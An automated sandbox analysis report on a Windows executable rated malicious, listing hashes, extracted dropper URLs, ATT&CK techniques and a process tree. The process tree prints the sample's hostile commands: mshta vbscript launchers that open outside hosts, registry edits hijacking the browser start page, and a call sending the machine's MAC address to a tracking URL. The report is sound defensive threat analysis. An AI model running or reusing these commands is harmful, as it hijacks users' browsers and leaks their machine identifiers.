c2573e2c825fcf6c63ccf3db067dce07000c4fdfa507f93365701377b755ad9c

Analysis

max time kernel
2s
max time network
141s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
02/01/2024, 15:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7e68b17d4fa5b2e59f1b6309a6581519.exe
Size

44KB
MD5

7e68b17d4fa5b2e59f1b6309a6581519
SHA1

5d66be6c523ef8eda99d09b0989c8d31732debb9
SHA256

c2573e2c825fcf6c63ccf3db067dce07000c4fdfa507f93365701377b755ad9c
SHA512

d2a125aacc5476fb80bc4c0d189aec5ccadc30c61a39b2a7082c0f786a2de932efd8dc11f394433037043e48c147111e11d5b2f7862c4aeac14217cb0a724a4d
SSDEEP

384:GjiXAA8k9OgEZ6Q/SD/Vc28bkBp1NlEcFh19hJlS5J0f6VA72Y9FSPlHBPXxtpJZ:V9OggI/VEYNlnUXxth

Score

10^/10

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://adminlzcheng.6600.org/img/tc.htm?34",0)(window.close)

Extracted

Language

hta

Source

URLs

hta.dropper

http://www.27dh.com/?34tc",0)(window.close)

Signatures

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\WINDOWS\46.bat	7e68b17d4fa5b2e59f1b6309a6581519.exe
File opened for modification	C:\WINDOWS\46.vbs	7e68b17d4fa5b2e59f1b6309a6581519.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
1556	tasklist.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
2836	ipconfig.exe

Runs regedit.exe 2 IoCs

pid	Process
336	regedit.exe
1764	regedit.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2240	7e68b17d4fa5b2e59f1b6309a6581519.exe
2240	7e68b17d4fa5b2e59f1b6309a6581519.exe
2240	7e68b17d4fa5b2e59f1b6309a6581519.exe
2240	7e68b17d4fa5b2e59f1b6309a6581519.exe
2240	7e68b17d4fa5b2e59f1b6309a6581519.exe
2240	7e68b17d4fa5b2e59f1b6309a6581519.exe
2240	7e68b17d4fa5b2e59f1b6309a6581519.exe
2240	7e68b17d4fa5b2e59f1b6309a6581519.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2240	7e68b17d4fa5b2e59f1b6309a6581519.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2240 wrote to memory of 2924	2240	7e68b17d4fa5b2e59f1b6309a6581519.exe	22
PID 2240 wrote to memory of 2924	2240	7e68b17d4fa5b2e59f1b6309a6581519.exe	22
PID 2240 wrote to memory of 2924	2240	7e68b17d4fa5b2e59f1b6309a6581519.exe	22
PID 2240 wrote to memory of 2924	2240	7e68b17d4fa5b2e59f1b6309a6581519.exe	22
PID 2240 wrote to memory of 2676	2240	7e68b17d4fa5b2e59f1b6309a6581519.exe	17
PID 2240 wrote to memory of 2676	2240	7e68b17d4fa5b2e59f1b6309a6581519.exe	17
PID 2240 wrote to memory of 2676	2240	7e68b17d4fa5b2e59f1b6309a6581519.exe	17
PID 2240 wrote to memory of 2676	2240	7e68b17d4fa5b2e59f1b6309a6581519.exe	17
PID 2924 wrote to memory of 2844	2924	cmd.exe	19
PID 2924 wrote to memory of 2844	2924	cmd.exe	19
PID 2924 wrote to memory of 2844	2924	cmd.exe	19
PID 2924 wrote to memory of 2844	2924	cmd.exe	19

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2384	attrib.exe
2536	attrib.exe
1884	attrib.exe
1728	attrib.exe

C:\Users\Admin\AppData\Local\Temp\7e68b17d4fa5b2e59f1b6309a6581519.exe
"C:\Users\Admin\AppData\Local\Temp\7e68b17d4fa5b2e59f1b6309a6581519.exe"
1⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2240
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "C:\WINDOWS\46.vbs"
  2⤵
  PID:2676
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\WINDOWS\46.vbs"
    3⤵
    PID:3020
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\WINDOWS\46.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2924
- - C:\Windows\SysWOW64\mshta.exe
    mshta vbscript:CreateObject("WScript.Shell").Run("iexplore http://www.27dh.com/?34tc",0)(window.close)
    3⤵
    PID:2972
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.27dh.com/?34tc
      4⤵
      PID:1992
- - C:\Windows\SysWOW64\regedit.exe
    Regedit /s add7.rig
    3⤵
    - Runs regedit.exe
    PID:336
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /f
    3⤵
    PID:476
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{86AEFBE8-763F-0647-899C-A93138888899}" /f
    3⤵
    PID:2368
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKEY_CLASSES_ROOT\CLSID\{86AEFBE8-763F-0647-899C-A93138888899}" /f
    3⤵
    PID:2196
- - C:\Windows\SysWOW64\attrib.exe
    attrib -r "C:\Users\Admin\í╕┐¬╩╝í╣▓╦╡Ñ\│╠╨≥\╞⌠╢»\*.lnk"
    3⤵
    - Views/modifies file attributes
    PID:1728
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{86AEFBE8-763F-0647-899C-A93138888899}" /f
    3⤵
    PID:2452
- - C:\Windows\SysWOW64\regedit.exe
    Regedit /s web.rig
    3⤵
    - Runs regedit.exe
    PID:1764
- - C:\Windows\SysWOW64\attrib.exe
    attrib -r "C:\Users\Admin\í╕┐¬╩╝í╣▓╦╡Ñ\│╠╨≥\*.lnk"
    3⤵
    - Views/modifies file attributes
    PID:2384
- - C:\Windows\SysWOW64\attrib.exe
    attrib -r "C:\Users\Admin\╫└├µ\*.lnk"
    3⤵
    - Views/modifies file attributes
    PID:2536
- - C:\Windows\SysWOW64\attrib.exe
    attrib -r "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*.lnk"
    3⤵
    - Views/modifies file attributes
    PID:1884
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ipconfig /all|findstr /c:"Physical Address"
    3⤵
    PID:1116
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /c:"Physical Address"
      4⤵
      PID:1860
  - - C:\Windows\SysWOW64\ipconfig.exe
      ipconfig /all
      4⤵
      Gathers network information
      PID:2836
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist /nh
    3⤵
    - Enumerates processes with tasklist
    PID:1556
- - C:\Windows\SysWOW64\regini.exe
    regini C:\Windows\system32\regsets.ini
    3⤵
    PID:688
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.27dh.com/?10034/" /f
    3⤵
    PID:760
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Windows\help\rllfdDSDfds7.vbs"
    3⤵
    PID:596
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.fx0099.cn/tj/tj.asp?mac= 00:00:00:00:00:00:00:E0&ver=370426&userid=34
      4⤵
      PID:1312

C:\Windows\SysWOW64\mshta.exe
mshta vbscript:CreateObject("WScript.Shell").Run("iexplore http://adminlzcheng.6600.org/img/tc.htm?34",0)(window.close)
1⤵
PID:2844
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" http://adminlzcheng.6600.org/img/tc.htm?34
  2⤵
  PID:2780
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2780 CREDAT:275457 /prefetch:2
    3⤵
    PID:2584
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2780 CREDAT:209930 /prefetch:2
    3⤵
    PID:1908
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2780 CREDAT:668691 /prefetch:2
    3⤵
    PID:552

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Process Discovery

T1057

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Windows 7 deprecation

Loading Replay Monitor...

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads